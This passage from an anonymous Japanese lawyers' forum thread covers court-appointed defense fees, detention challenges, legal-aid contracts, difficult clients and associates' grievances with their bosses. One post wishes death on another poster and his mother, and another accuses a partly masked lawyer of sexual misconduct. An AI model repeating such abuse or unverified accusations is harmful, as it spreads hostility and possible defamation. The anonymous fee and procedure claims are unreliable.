 保釈決定による加算だと思うが、それでも、無意味な保釈請求の乱発は起きると思う。但し、現行でも、保釈決定加算があるなら変化はないかもしれない。
 それから、うる覚えだが、被疑者弁護では、勾留決定を準抗告でつぶした場合は、報酬が加算されるのではなかったか?
 反対派の理屈で行けば、これもPとしては嫌だから加算されないはず。
 更に言うと、示談は民事事件であり、必ずしも国選弁護人の職務に含まれるわけではないから成立したら加算するけど、保釈は職務に含まれるので加算なしという考えもありうる。

 このように述べると、法テラス推進派のようだが、本音を言えば、特に被疑者弁護はやりたくない。でも、反対派のロジックもどうかなぁと思う。

797 :無責任な名無しさん:2006/07/20(木) 12:17:53 ID:Xpitm0Fz
 連投すみません。私の理屈で行くと、無意味な準抗告申立も乱発されるのかな。
準抗告のほうが、保釈請求よりも敷居は高そうだけど。

798 :無責任な名無しさん:2006/07/20(木) 13:03:04 ID:+9yIVYYu
>>764
ハイ懲戒!
扶助事件の報酬は扶助協会から出る

799 :798:2006/07/20(木) 13:05:13 ID:+9yIVYYu
そうか,支部によって違うんだ。
>>764
撤回します すいません

800 :無責任な名無しさん:2006/07/20(木) 13:06:01 ID:/o+kqXtu
>>798
だから契約書読めよ。
扶助の破産事件の報酬は直払いだよ。

801 :無責任な名無しさん:2006/07/20(木) 13:06:51 ID:+9yIVYYu
検察官がバカみたいに準抗告出しまくったから検察官の都合の良い運用になった
という経緯からすると,無意味な準抗告をたくさんやることも,大局的には意味があるのかも知れない。

802 :無責任な名無しさん:2006/07/20(木) 13:12:54 ID:+9yIVYYu
>>800
今破産の扶助の代理援助契約書を見てみたが,
報酬金は,「後日審査会で決定する金額並びに支払い方法とする」とあるよ。

したがって,契約書が支部単位かどうかが問題だね。


803 :無責任な名無しさん:2006/07/20(木) 14:38:30 ID:Xpitm0Fz
 漏れもみてみたが、
 第5条 援助終結時の措置
  (1) 審査会は前条の場合、下記の事項を決定する。
     @ 報酬金の額並びに支払条件及び支払方法
 とあるね。
 支部ごとに違うのかなぁ?うちの支部(関西地方)では、破産・債務整理では、過払金を回収した場合のみ報酬決定がなされる運用だけど。

804 :800:2006/07/20(木) 15:34:39 ID:/o+kqXtu
扱いが支部ごとに違うのかなあ。
うちでは破産の場合、報酬金の欄に「なし、又は免責決定後52,500円本人払いとする。」
と印刷してあるけど。

805 :無責任な名無しさん:2006/07/20(木) 15:57:06 ID:dt/zxp/6
破産債権になるから本人に報酬支払義務はないだろ。


806 :無責任な名無しさん:2006/07/20(木) 16:08:01 ID:+9yIVYYu
>>805
それを言い出すとそもそも扶助制度自体が…

807 :無責任な名無しさん:2006/07/20(木) 16:08:28 ID:Xpitm0Fz
>805
 それを言うなら、扶助協会への償還義務も同じことでは?管財事件になっても、財団債権とはしていないように思いますが。
もともと、弁護士が貰うお金なんて実質自然債務でしょう。弁護士が依頼者相手に報酬金を払えと裁判を起こした事例って、懲戒された弁護士の話でしか聞いたことがない。

808 :無責任な名無しさん:2006/07/20(木) 16:16:19 ID:+9yIVYYu
>>807
数は少ないけど,報酬金請求の訴訟って時々見るよ
懲戒関係なく

809 :無責任な名無しさん:2006/07/20(木) 16:26:00 ID:hLkYXyDb
>>804
そのとおり。扱いが支部毎に違う。
登録換えして扱いの違いを体験した俺が言うんだから間違いない。

810 :無責任な名無しさん:2006/07/20(木) 16:26:03 ID:AFt2j8LM
この前ボスに、報酬金請求訴訟やらされそうになった。
当事者ボスで俺が代理人なのか、俺も当事者になって当事者訴訟をやれ
と言われたのか、はっきりしなかったけど。
地方会なので、恥ずかしいので止めて欲しいとうんざりしていたら、何とか
適当に解決してくれたらしいので良かった。

811 :無責任な名無しさん:2006/07/20(木) 16:42:18 ID:dzYwQ5cr
>>801
 そういう大局的見地は,確かに重要だと思う。いわゆるフルコース弁護
(勾留取消・接見禁止取消(一部解除)・勾留理由開示・準抗告等々)を
日弁が推奨していた次期もある。いわゆる(あくまでいわゆる)「司法改革」
の折り,初心に返り,そういう弁護方針を打ち出しても良いと思うのだが,
なぜか日弁連は,今はそういうことを言っていない。

812 :無責任な名無しさん:2006/07/20(木) 17:44:27 ID:wcTAVmRU
>>807
そんな大らかなことも言えなくなりそうです。
中坊さんのお布施論など、私としてはそういう意識はそろそろ捨てるべきでは
と思っていますが。

813 :無責任な名無しさん:2006/07/20(木) 19:18:28 ID:+9yIVYYu
ま,一生懸命やって無罪とっても報酬はないからな
被害弁償の報酬はあるけどw

814 :無責任な名無しさん:2006/07/20(木) 19:45:33 ID:/SzgDQTl
勾留理由開示を奨励されても困るっしょw

815 :無責任な名無しさん:2006/07/20(木) 19:55:57 ID:+9yIVYYu
奨励して良いんじゃないの
俺も意味なくはやらないけど,やらないといけない時ってのもあるはずだよ。
でも何もなし

816 :無責任な名無しさん:2006/07/20(木) 22:03:48 ID:soCS2QCa
勾留理由開示やる場合って、接見禁止が付いているけど家族の顔を見せたいとか
目的外利用がほとんどじゃない? どうせ裁判所もまともな理由を開示しないわけだし。
それよりさっさと準抗告した方がいいと思われ。

817 :無責任な名無しさん:2006/07/20(木) 22:06:15 ID:/SzgDQTl
判事補一世一代の大舞台っつーだけだよねw

818 :無責任な名無しさん:2006/07/20(木) 23:43:06 ID:1RScADar
ここは全件準抗告主義で

819 :無責任な名無しさん:2006/07/20(木) 23:59:40 ID:soCS2QCa
準抗告の処理が滞留して、本当に認容(原決定取消・勾留却下)される分まで10日以上掛かったりして

820 :無責任な名無しさん:2006/07/21(金) 00:01:40 ID:ygv1kL86
>>819
そしたら国賠に移行だ!

821 :無責任な名無しさん:2006/07/21(金) 00:14:30 ID:VoT5Fl/K
>>817
 勾留理由開示をやると,裁判官が見物(けんぶつ)に来るんだね。特に未特例だったりすると。
 まぁ,この制度は,憲法に書いてあるから,仕方なくやっているだけで,接見禁止の潜脱(傍聴席か
ら「ガンガレー」とか声かける)とか,代監が飽きたとか,メディアに書いてもらいたいとか,そうい
う目的何だけでね。
 
 控訴保釈のため,勾留理由開示請求やったら,保釈が認められたことはある。

822 :無責任な名無しさん:2006/07/21(金) 00:19:05 ID:VoT5Fl/K
 大都会の裁判所は違うかも知れないけど,中規模以下の地裁では,
準抗告受理審は「1民・2民」なんだよね。臨時で「刑事部」に早
変わりする。楽しいと思わないかい?
 私は,準抗告を認容されたことはこれまで,2件くらいある。検事
準抗告棄却は3−4件ある。


823 :無責任な名無しさん:2006/07/21(金) 00:19:26 ID:4SkEnSb8
>>817
判事補だって迷惑してるだろ。
特に民事部配属で令状当番だけやってる判事補なんて迷惑以外の何者でもなさそう。
制度自体が浮いているしね。

824 :無責任な名無しさん:2006/07/21(金) 00:22:15 ID:X4D+/iFz
まあ、準抗にしろ、理由開示にしろ、ほどほど(控えめ)に、ってことだろうね。

825 :無責任な名無しさん:2006/07/21(金) 00:25:06 ID:ygv1kL86
準抗告と勾留理由開示と勾留取消請求は,検察庁に対抗する御三家(3点セット)だよ。
ミランダが昔矢継ぎ早にやって,そのうち疲れたからか,あまりやらなくなった。
ただ,接見禁止や勾留延長の準抗告は理由がシッカリしていれば実益がある。

826 :無責任な名無しさん:2006/07/21(金) 00:33:04 ID:VoT5Fl/K
>>823
 傍聴席からの罵声(退廷命令発動)とかテンションの異様に高い被告人・弁護人への対処(発言禁止・
拘束)とか,結構勉強になるyo。
 弁護人からの「タメにする」求釈明への対処法とか・・・。
 
 それにしてもさぁ? 勾留理由開示請求すると,「求釈明事項を事実上教えてくれないか?」としつこ
くヴェテの書記官から電話があるのよ。
 私の求釈明の第1弾は「現在被告人は勾留されているが,これは,勾留状発布時にその理由と必要
があったのか?」
 第2弾「現時点において勾留の理由と必要はあるのか」
 みたいな感じ。

 この3年くらい勾留理由開示をやっていないので,勘が鈍ってしまった。意味もなく明日あたりやってみようか?
 

827 :無責任な名無しさん:2006/07/21(金) 00:45:56 ID:tbmSv7lo
理由開示は真性の否認事件で1度やりました。
迎合しやすい被疑者で,いつ(虚偽の)自白を取られるかヒヤヒヤしてましたが,
理由開示法廷でこの人は無実なんだという意見をしっかり述べたところ,
(手の内を見せずに意見を述べるのはなかなか苦労しますが)
とても勇気づけられたようで,最後まで否認を通してました。
弁護人としては,どうしても被疑者の弁解の弱い部分を厳しくつつくため,
「本当に先生は俺のこと信じてくれてるのだろうか?」と
不安になっていた部分もあったのかもしれません。
弁護人が法廷で自分の無実を主張してくれたことがよほど嬉しかったのでしょう。
理由開示自体は,官僚の答弁みたいで,何も得られませんでしたが。
最後は不起訴になりました。

828 :無責任な名無しさん:2006/07/21(金) 01:00:13 ID:VoT5Fl/K
>>827

 頑張るんだ!!! この板を見ているすべての人が,君を応援している。
君の一件無意味で地味な努力こそが,「いわゆる」司法改革,人質司法,絶望的刑事法を変えるのだ。

829 :無責任な名無しさん:2006/07/21(金) 01:12:23 ID:71KLrUai
いまどき破産で引き直ししないと全然はけないぞ,裁判所で止められるから。
管財人の報酬は書記官が自分の給与と比べるから上がらないと聞いたことがある。

無罪の場合でも国選の報酬は同じ。これも親しい書記官から。

>>827
ガンガレ。金にはならなくれもそのスジの人には慕われるよw

830 :無責任な名無しさん:2006/07/21(金) 03:59:24 ID:0mAmn/hY
>>827
おおそういうメリットが具体的にあったんだね。
それなら状況によっては有意義な制度だね。
勉強になりました。

831 :名無しさん@恐縮です:2006/07/21(金) 08:49:43 ID:7Ypv+Ege
無罪・保釈加算がなければ、
「無罪とっても報酬は一緒だからねえ。」と説明すれば、
私選を選択する被疑者被告人は増えるかも。


832 :無責任な名無しさん:2006/07/21(金) 14:42:04 ID:5irE7bsl
勾留理由開示請求するとき追加報酬とるの?

833 :無責任な名無しさん:2006/07/21(金) 15:27:08 ID:nsudTL66
示談したら3万だけど,できなかったら骨折り損。
しかし法テラスのパンフにのってる計算例ではしっかり示談した場合のが載ってた。
示談できるケースなんてどれだけあるっていうんだよ。
地裁単独事件(3回開廷)で考えると8万5千円→8万円の減額。
どうせやらないからいいけどね。
細かく働くのがしんどい年齢になってきたからこれからはデイトレーダーを目指すか。

834 :無責任な名無しさん:2006/07/21(金) 15:53:08 ID:GAJ+f4PJ
デイトレの方がしんどいよ。


835 :無責任な名無しさん:2006/07/21(金) 16:27:53 ID:cOorPkh4
こちらに連絡下さいと留守電に伝言を残しても、手紙を出してもなかなか
連絡を寄越さない依頼者。
そのために準備が進まず、苦労させられ、裁判所には嫌味を言われる。
そのくせして、自分が弁護士に用があるときは、事務所に何回も電話してきて
不在だと怒り、今日中に何が何でも直接連絡取りたいと言い張り、裁判
終わって真っ先に電話しても遅いと怒鳴られる。
あー、何で弁護士なんかになってしまったんだろうと思う瞬間・・・。

836 :無責任な名無しさん:2006/07/21(金) 16:32:36 ID:pwj5GDZi
>>835


や〜め〜ち〜ま〜え〜



弁護士をじゃないよ。その事件をだよ。

837 :無責任な名無しさん:2006/07/21(金) 16:40:52 ID:nsudTL66
所詮文句言いでなければ弁護士の顧客とはならない

838 :無責任な名無しさん:2006/07/21(金) 16:45:34 ID:4mjj7C/x
 法テラスの示談金加算ですが、どの範囲で示談成立とするのだろう。
 刑事事件における示談では、払える金額がもとから決まっていることが多いので、損害内金として支払い、嘆願書を貰うという形をとることも多いのだけど、清算条項まで含めた示談書が必要となるのかな。

839 :無責任な名無しさん:2006/07/21(金) 16:53:12 ID:zShkHs3+
報酬加算のために、示談書を裁判所に証拠として出したという証明
が必要らしいよ。
証拠カードとか?

840 :無責任な名無しさん:2006/07/21(金) 17:36:19 ID:Edq8qDye
>>839
年度末になると,検察庁が予算の関係で不同意したりするかも知れないw

841 :無責任な名無しさん:2006/07/21(金) 19:13:33 ID:eCIXkkOw
>>835
お前がバカなのでは?
依頼者をきちんということ聞かせるのも腕だよ。
これでは上手くいっても報酬取りたてられなさそうだね。

信用できない依頼者の場合はとにかく文書での連絡にする。
場合によっては携帯メール等を上手く使っても良い。
とにかく、証拠が残るようにしておく。
そして、何かあるときはいつでも辞任してやるくらいの気持ちで毅然と接する。

842 :無責任な名無しさん:2006/07/21(金) 19:14:06 ID:eCIXkkOw
>>838
精算条項まで入れちゃったら、交通事故案件なんて絶対無理じゃん。

843 :無責任な名無しさん:2006/07/21(金) 19:58:03 ID:Edq8qDye
>>839
ふと気づくと,示談書がいるんだな
現金書留で送りつけたとか振込入金したとかってダメなのか

めんどくせえ

>>841
おまえがバカだと思うよ。
58期あたりかね。
もう少しいろいろ経験しなさいや。


844 :無責任な名無しさん:2006/07/21(金) 21:49:23 ID:+ONAxdbJ
以上、僭越ながら総括いたしますと、
弁護士は、自由業ですから、
 イヤなヤツの事件を断り続けても、生活ができてます、と言える状況か、
 イヤなヤツの事件もしていかないと、私の生活が立ちません、という境涯なのか、
デツね、に尽きるんでは?


845 :無責任な名無しさん:2006/07/21(金) 21:58:52 ID:6Wttd9Ri
>>841
腕の見せどころは、初回で見分けて、依頼を断るところだな。

846 :無責任な名無しさん:2006/07/21(金) 21:59:39 ID:QIJYE5bK
こんな事件嫌だし,やらなくたって生活できるが,
可哀想だし,それなりに余裕があるんだから,やってあげたっていいか。
と思って受けたことを後悔するってこともある。

847 :無責任な名無しさん:2006/07/21(金) 23:16:38 ID:6Wttd9Ri
そういう後悔を乗り越えて、即座に依頼を断る腕があがる。

848 :無責任な名無しさん:2006/07/22(土) 00:57:35 ID:oGygWXEY
非弁ですが質問させて下さい。

自分はまだ事務局員となって日が浅い方なんですが、最近電話をとると、
明らかに頭がおかしいとしか思えない人たちからの話が多く困惑しています。
一応先生方に「こんな電話がありました」とお伝えしてはいるんですが、
過去にも来られて困ったから断ってくれと言われたり、年のためにきてもらっっても、
話が全然通じないしわからないし、先生が思わず大声を出してたりと驚きの毎日です。

精神的に何かあるのかどうか確証はないんですが、そういう人からの電話とか依頼って
多いものなのでしょうか?自分たちはちょっと応対するだけだからいいですが、
先生方は話を聞かれたりなんだりで接する機会が多いので気の毒です。

849 :無責任な名無しさん:2006/07/22(土) 01:56:02 ID:KQ0MfGiI
病院経営とは、そういうもんだ。患者は病んでる。

850 :無責任な名無しさん:2006/07/22(土) 06:09:42 ID:i4SQroAz
>>848
 ある種の精神疾患は,伝染性がある。躁鬱で躁状態の人とかと
対応すると,弁護士も躁状態になったりする。
 精神疾患が疑われる一見のお客さんは,事務局レベルで,上手に断
るのが相当と思われ。
 事務局員の仕事として,弁護士のメンタルケアも重要です。仕事を
ため込んで鬱になりかかったり(スパイラル),反対尋問対策や刑事
事件(否認)のやり過ぎで不安神経症に罹患する弁もいるから・・・・。

851 :無責任な名無しさん:2006/07/22(土) 06:26:46 ID:i4SQroAz
 極めて基本的な問題だけど,崩テラスが決定した国選弁護費用は,
「訴訟費用は被告人の負担とする」という判決になることはあるのか?
「訴訟費用は,崩テラスの負担とし,被告人に負担させない」という主
文がもらえるのか?

852 :無責任な名無しさん:2006/07/22(土) 06:30:50 ID:ATTd89ND
>>851
真性馬鹿?

ここ数年見てる中で一番馬鹿な書込みだな。

853 :背の高いブ男:2006/07/22(土) 07:03:18 ID:6IkfHsdj
ふーむ。


854 :無責任な名無しさん:2006/07/22(土) 07:53:03 ID:4zyZBTl/
↑ マサカとは思うが、もし851が真正弁護士だとしたら、
法曹界も、とんでもない時代になってきたことを実感する。

公認会計士が粉飾決算を認証するどころか、
貸借対照表を読めないというに匹敵する。

855 :無責任な名無しさん:2006/07/22(土) 09:20:06 ID:+X+0SMpe
>>851
訴訟費用=弁護士報酬?
きわめて基本的な問題ですね。

856 :無責任な名無しさん:2006/07/22(土) 09:33:25 ID:4Q66iCUS
非弁のアホ意見はスレタイに合せてスルーしましょ
単純に時間の無駄だから

857 :無責任な名無しさん:2006/07/22(土) 10:35:28 ID:VJ9pQ6/J
え〜。
訴訟費用の中には国選弁護報酬も含まれるんじゃないの?

858 :無責任な名無しさん:2006/07/22(土) 11:11:31 ID:KQ0MfGiI
訴訟費用の中には、国選弁護人報酬も含まれる。
東京の場合は、裁判所→弁護士会→弁護士 で支払われてるのが
裁判所→法テロス→弁護士 になるだけでしょ。

控訴審の記録をみれば一審弁護人がどれだけもらったかも書いてある。

859 :無責任な名無しさん:2006/07/22(土) 12:36:30 ID:VJ9pQ6/J
まいった、まいった。
午前中から仕事に行こうと思っていたのに、
ダラダラ過ごしてしまった。

860 :無責任な名無しさん:2006/07/22(土) 12:53:15 ID:Ewv2XtqV
俺は家で午前中から仕事しようと思ってたのにソファの上で寝てしまい、
気がついたらもう昼だ・・。

861 :無責任な名無しさん:2006/07/22(土) 13:16:07 ID:ijEPTf1H
昨日は、7月21日
つまり0721であり、オナニーの日でありました。

弁護士もオナニーするの?

862 :無責任な名無しさん:2006/07/22(土) 14:45:01 ID:wVrMoBik
>>861
もったいないからしません

863 :MS754 ◆yGUnQdhyV2 :2006/07/22(土) 15:51:04 ID:NbgNi6Sb
本日の果物

メロン 1個

累計

メロン 7個  サクランボ 4パック(佐藤錦)  マンゴー 3個
ミカン 2箱(5sと15s)  ぶどう 1kg(ピオーネ)

今年は、そろそろおしまいかな。メロンが半減。


864 :無責任な名無しさん:2006/07/22(土) 18:36:54 ID:4yvTui3A
>>835
ちょっと前もイソ弁時代の悲哀を書いたが、あなたのような経験もあるなぁ。
ボスが無料相談とかで依頼者を引っ張ってくる。30分くらい話聞いただけ。
受けるって言っといたから、あとキミよろしくね、で丸投げ。
さてさて依頼者と打合せ。なんでこの人の依頼受けたんだとすぐに思うw
受任弁護士にはボスの名も当然連ねているので、ボスが懲戒になってはまずいので、
とにかく依頼者のわがままにもできるだけ対応する。
突然事務所にやってきて話を聞いてもらわないと困ると言い張り以前にも何回も聞いた
話を2時間くらい聞かされる、ボスに話をしたい若造のお前じゃ話にならない
みたいな態度をとられつつ何とかなだめる、なんとか判決が出てめでたく勝訴しかし報酬
を渋り出したのでまたまたなだめて報酬を払ってもらう
などという苦労が思い出されるw

難しいタイプの依頼者こそとにかく気を遣うでしょ。
辞任ちらつかせても効果ない人(むしろ逆上して懲戒なんつー人)も一杯いるお。


865 :無責任な名無しさん:2006/07/22(土) 20:00:07 ID:fzPiqiIZ
>>864
めでたく勝訴できるんなら問題ないじゃん。
その依頼者連れてきたボスの眼力がするどい。

おれのときは、ただでさえ勝ち目が薄いのに、こっちの不利な事実を
認めまくった内容証明出したあとに、あとやってってふられたりしたぞ。

866 :無責任な名無しさん:2006/07/22(土) 22:34:35 ID:N65vVrgP
そうそう。
勝てる事件ならまだいい。
最初の打ち合わせに同席しただけで
ボスが「これは相手がひどいねぇ〜」と依頼者をいい気分にさせて、
後は丸投げ。
資料を見て詳しく話を聞いてみると、
明らかに依頼者に不利。つーか、依頼者が悪いんだろ、という事件。
それを説明すると、「○○先生(ボス)は勝てそうなことを言っていたのに」と
私が無能扱い。もう、しらん。

867 :無責任な名無しさん:2006/07/22(土) 22:37:47 ID:aPGFheoL
そんな事務所に就職するのが悪いわな。
ボスの人格を見抜けない時点で(以下ry)

868 :無責任な名無しさん:2006/07/22(土) 23:08:48 ID:8tmZ/SWp
どうか、867が死にますように。
この世のすべての不幸が867に起こりますように。
867の家族すべてが地獄に落ちますように。
とくに867のお母さんが真っ先に死にますように。

869 :休憩中 ◆tr.t4dJfuU :2006/07/22(土) 23:27:41 ID:F9des1yS
>868
順序が・・・

870 :無責任な名無しさん:2006/07/23(日) 03:44:26 ID:TUVzHZes
弁護士大増員のせいか、派遣社員並にしかイソ弁を考えてない経営者もいるね
とってきた事件はすべて事務所事件として、個人事件は事実上、取らせないようにする。
給与があがりそうな一定の時期がきたら独立することを予め誓約させておく。
独立に際しては、手持ち事件はすべて置いていくようにする。
そいつが止めれば、新しくて単価の安い新卒イソ弁を雇う。→繰り返し。
まあサラ金事件も減ってるし、太い客層がない経営者も大変なんだろうが
精神まで貧乏くさいね


871 :無責任な名無しさん:2006/07/23(日) 04:01:21 ID:S7YFRYz/
>>865-866
どちらかは漏れのいた事務所一確

872 :無責任な名無しさん:2006/07/23(日) 08:22:32 ID:mp2qQ6zB
あえてこの板で、先生がたにお聞きします
弁護士先生の日当は大体おいくらでしょうか?
手付金払い、その後何回か打ち合わせ(無料)
先日交渉先(遠距離)にいってきてもらいました
朝から夜遅くまで一日がかりでした
日当はらいますが、どのくらいが適当なのでしょうか
交通費別で10万ではすくないですか?

873 :無責任な名無しさん:2006/07/23(日) 08:38:24 ID:5hEed/8D
>>872
どんな事件か分からんから、何とも言えませんが、
手付け金(手間賃)というのは着手金のことでしょうか。

今まで弁護士がしていることは、この着手金に含まれています。
事件が終わって満足したら、貴方の予想を超える金額の
成功報酬請求というのを送ってくるから、
今から心配する必要はありません。

多分、10万円というのは桁違いでしょう。
弁護士が依頼者からいただく金額で100万円以下というのは
例外と思っていた方がよい。


874 :MS754 ◆yGUnQdhyV2 :2006/07/23(日) 09:05:00 ID:+KJEsHdJ
>>873
いいねえ。お金持ちの依頼者ばかりで。うちは、100万円以上が例外だよ。


875 :無責任な名無しさん:2006/07/23(日) 09:49:29 ID:pzvGp7Xo
日当だけなら10万円で十分じゃないの。

876 :無責任な名無しさん:2006/07/23(日) 10:28:32 ID:ScDw3Lgv
>870
それはうちのボスのことですか・・・
個人事件は取らせてくれるけど、全額事務所に上納。
労働者ではないというのが口癖のうちのボス、ひたすらこき使ってくれます。
個人事件で事務所にお金を入れているのに、イソ弁の事件は事務員すら
協力してくれない。
年々事務所に入れる額は増えているのに給料は初任給のまま。
最悪なので、辞めて独立することにしました。
報酬とれそうな手持ち事件は置いていけと言われ、報酬とれなそうな手持ち事件は、
この事件よく知らないからそのまま持って行ってだそうな・・・。

ボスとイソ弁の間を調整してくれる機関ってないんだろうか。
これからは必要な気がする。

877 :無責任な名無しさん:2006/07/23(日) 11:13:10 ID:xfpppq1D
まあ、何にしても、弁護士としての能力を高めるしかないよ。

878 :無責任な名無しさん:2006/07/23(日) 12:04:22 ID:Um1RGTBo
>>876
うちもだ。とっても酷似。同じ事務所じゃないだろなw
給料上がらないのにしても、経営が苦しいっていうのなら
まだわかるけど、ボスは日々豪遊。
忙しいのにしても、全員が必死に仕事してるのなら
まだ連帯感も出てくるけど、イソ弁は激務なのにボスは日々
早々と帰宅し、土日祝休。我々は個人事件もする暇なし。
やってらんないよという気になってきてもおかしくはない。
こんな扱いしてて、イソ弁みんなで辞めたらどうすんだろな。

879 :無責任な名無しさん:2006/07/23(日) 12:53:22 ID:EV6Gi2o5
  14 名前: 無責任な名無しさん 投稿日: 2006/07/22(土) 20:55:23 ID:tdMw0Obf
   受任弁護士とは契約書を交付していない、
   訴訟についての見込みも、まったく聞かされていない、

   これを聞いた裁判所の書記官は、仰天して、二の句を告げられなかった。

   これが、法的知識に疎い「社会的弱者」に対する、弁護士の、普通の対応。


原則契約書作成が規則化されてからしばらく経ちますが,正直なところ,ちゃんと作っておられますか?
交渉案件などではわざわざ作る方が面倒臭くて・・・
依頼者とのトラブルの可能性が見える事件を中心に半数程度の事件でしか作成できていません。

880 :無責任な名無しさん:2006/07/23(日) 15:31:21 ID:fpUtYk4e
>>878
弁護士のため息
http://t-m-lawyer.cocolog-nifty.com/blog/2006/07/post_28b2.html
2006年7月20日 (木) なかなか記事が書けない理由

どうして将来に危機感を抱いてもいいはずの若手弁護士がこういう勉強会に参加
しようとしないのかについて、勉強会の後の食事会(飲み会)で、委員会のメンバ
ーらと議論になった。

 その議論の中で、そもそも若手は本当に危機感を抱いているのかという話にな
り、ある弁護士が、

 若手は本当の意味での危機感を抱いていない。
なぜなら、一生「イソ弁」(勤務弁護士のこと、一生「イソ弁」でいるなら「イソ弁」ー
居候弁護士の略ーというのはおかしいが)でいるつもりの人が大半だから。

今はイソ弁が数年したら独立するという時代ではない。
「一生ボスについていく。ボスの指示に従って仕事をする。
指示どおりに仕事をする方が楽だ。」という人が多い。

今はボス弁の方がイソ弁に独立してもらいたくても労働問題に発展しかねないの
で独立を促すことができないようになっている。
無理に独立を切り出してボス弁とイソ弁の労働紛争になった例もある。


881 :無責任な名無しさん:2006/07/23(日) 16:36:34 ID:OIdQz4xY
>>876,878

辞める気力のあるときに辞められることは幸いだと思うよ・・・
知ってるイソ弁は,同じような悩みを持ってるけど
「今から就職活動して,他の事務所を回ると
それがボスの耳に入ってさらに嫌がらせされるんじゃないか」って悩んでて
次のステップにさえ移れなくなってる。
そういう悩み抱えながらやってるから,さらに仕事の進みが悪くなり
(元から自分には能力がないんじゃないか)って,がんじがらめになって
とりあえず目先の仕事をこなすのに手一杯になってるようだ。

勉強会に行っても,「勉強会で若手が何言っても無駄」,
「不満として受け取られて,それが現ボスの耳に入ったら怖い」,
「目先の仕事で手一杯で勉強会に行く時間がない」
ってことから行かないのじゃないかな

独立を切り出したり,体よく辞めさせるボスが増えるだろうから
本当は相当危機意識持たないといけないのだろうけどね


882 :無責任な名無しさん:2006/07/23(日) 16:57:58 ID:lehI8adS
これからはやめたくなくても辞めさせられるケースが増えるはずだよ。
労働力の供給過剰になるからね。

883 :無責任な名無しさん:2006/07/23(日) 19:05:56 ID:xfpppq1D
う〜ん。
ネットのうつ病自己診断をやると、どれもボーダーだ。
やばい。

884 :無責任な名無しさん:2006/07/23(日) 19:20:15 ID:pLlVNlCI
http://www.asahi-net.or.jp/~cn1s-fkd/toiawase/checklist/self/tsungu.html

885 :休憩中 ◆tr.t4dJfuU :2006/07/23(日) 19:25:15 ID:oVv38bnS
倒産関連とか執行の書式って統一してくれんかな。

886 :無責任な名無しさん:2006/07/23(日) 19:40:11 ID:xfpppq1D
>>884
40点

887 :無責任な名無しさん:2006/07/23(日) 21:09:52 ID:V+mpO0t4
21点だった。

888 :MS754 ◆yGUnQdhyV2 :2006/07/23(日) 21:17:34 ID:+KJEsHdJ
25点でした。

889 :無責任な名無しさん:2006/07/23(日) 21:55:47 ID:95fye+X7
27点!

890 :無責任な名無しさん:2006/07/23(日) 22:02:40 ID:pLlVNlCI
29点です。

891 :無責任な名無しさん:2006/07/23(日) 22:52:16 ID:pJ/TttOV
54点だ。

892 :無責任な名無しさん:2006/07/23(日) 23:20:07 ID:S+v16dIw
未熟弁護士の苦悩〜うつとともに〜
http://plaza.rakuten.co.jp/mijukubengoshi/

893 :無責任な名無しさん:2006/07/24(月) 00:12:22 ID:QnNFlgxt
51点でした。

これから仕事します・・・。

894 :無責任な名無しさん:2006/07/24(月) 00:59:03 ID:wFuhNj2T
>>893
同じ点数w
今から仕事するところもw

895 :無責任な名無しさん:2006/07/24(月) 01:16:50 ID:ho9O4aue
弁護士○橋○○はサイテー!
妻が裁判官で頭あがらないからって外で
女食い物にしてる!ローカルテレビに出たくらいで威張るな!
性病移しやがって!

896 :無責任な名無しさん:2006/07/24(月) 02:20:19 ID:2Eok8lgv
訴状の最終段階手続きが進みません。弁護士に電話を入れても
事務員が出て、弁護士不在と言われ、折り返し連絡が来る予定が来ない。もう1週間経過
この弁護士は悪徳?

897 :無責任な名無しさん:2006/07/24(月) 04:37:51 ID:0PYyKh1/
>>884
60点だった。今日は仕事止めて病院に行こうかな・・・
法テラスとか被疑者国選とか裁判員とか面倒な話が多すぎる・・・

898 :無責任な名無しさん:2006/07/24(月) 09:46:55 ID:8JRrtFrX
>>896
弁護士時間をご理解ください。

折り返しお電話しますは3日
すぐやりますは1週間
暇見てやりますは1年
様子を見ましょうは3年

899 :無責任な名無しさん:2006/07/24(月) 09:58:32 ID:HI6Yja4e
バブル再来の兆しを感じないか?
ここ最近バブルの前兆を思わせるような相談内容が増えている。金余りも極まれり
という感じだ。詳しくは書けないがね。とうです。皆さんもそう感じませんか?
と言っても、前回のバブルは20年以上も前の話しだから若い人は知らないだろうけど・・・

900 :無責任な名無しさん:2006/07/24(月) 10:00:54 ID:F7O7YF5Y
>>899
バブル絶頂期は、弁護士の平均年収を司法書士の平均年収が上回ったという話があるなあ。


901 :無責任な名無しさん:2006/07/24(月) 10:11:47 ID:HI6Yja4e
知り合いの成り立ての若い勤務司法書士が、客を紹介しただけで不動産屋から
500万円もらったそうだ。そんなにもらっていいのか声を震わせて心配していたよ。
なつかしい時代だ。

902 :無責任な名無しさん:2006/07/24(月) 10:32:21 ID:RTMK4wD4
>>898
納得。

903 :無責任な名無しさん:2006/07/24(月) 10:41:12 ID:k7qmZPxC
>>898
俺もそんなものだ
43点

ボス弁の人格がよいのも困るよ
独立したいのに申し訳なくってできない

904 :無責任な名無しさん:2006/07/24(月) 11:17:52 ID:pGH5WkEF
確かにイヤな事務所の方が独立しやすくていい。
オレの場合がそうだった。

905 :無責任な名無しさん:2006/07/24(月) 11:21:47 ID:F7O7YF5Y
>>903
3年ぐらいすると、ボスのほうから「いつごろ独立する?」とか聞かれない?
オレは、ボスからそう聞かれたんで、独立したけど。

906 :無責任な名無しさん:2006/07/24(月) 13:12:48 ID:k7qmZPxC
>>905
共同事務所化の話をうれしそうにしてくれます

907 :無責任な名無しさん:2006/07/24(月) 13:34:02 ID:MAu/+5Bd
>>906
うちもそうなんだけど、それ、何か含みがあるの?
それとも良い話として?

908 :無責任な名無しさん:2006/07/24(月) 13:37:33 ID:D+Nde4jV
>>907
それは、
「自分の事件は自由にやっていいし、事務員も設備も自由に使ってもらって構わないけど、
給料はゼロで、経費も分担してね。」
という申し入れなわけだ。

909 :無責任な名無しさん:2006/07/24(月) 15:39:25 ID:MAu/+5Bd
やっぱりそうだよね。

910 :無責任な名無しさん:2006/07/24(月) 17:25:15 ID:k7qmZPxC
>>908
おれはそれの方が負担額が小さくなるのでかまわないんだけど,
でも結局は「将来俺の顧問先をくれてやるから,俺の年金代わりにがんばれ」
という申出です。

911 :無責任な名無しさん:2006/07/24(月) 18:26:14 ID:JGpd6jmr

鬱気味の先生方へ。

気分を安定させて仕事を継続するためには,自分の「テーマソング」を選んで,仕事の始めや休憩時間・移動時間などに聞かれるとよいですよ。

気分を高揚させる歌がいいですよ。

私のテーマソングは,旧東ドイツの国歌です。
